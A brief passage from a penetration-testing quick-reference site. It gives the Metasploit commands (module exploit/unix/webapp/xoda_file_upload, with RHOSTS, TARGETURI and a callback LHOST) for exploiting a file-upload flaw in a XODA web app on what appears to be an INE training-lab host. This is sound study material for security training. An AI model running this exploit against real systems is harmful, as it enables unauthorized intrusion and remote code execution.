> For the complete documentation index, see [llms.txt](https://notes.cavementech.com/pentesting-quick-reference/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://notes.cavementech.com/pentesting-quick-reference/web-pentesting/misc-vulnerabilies.md).

# Misc Vulnerabilies

### XODA web app

A XODA web app instance is running on the system which can be exploited using the “exploit/unix/webapp/xoda\_file\_upload” Metasploit module.

```
use exploit/unix/webapp/xoda_file_upload
set RHOSTS demo1.ine.local
set TARGETURI /
set LHOST 192.63.4.2
exploit
```

<figure><img src="/files/G6e5V47A9DEKqkFhBIoK" alt=""><figcaption></figcaption></figure>
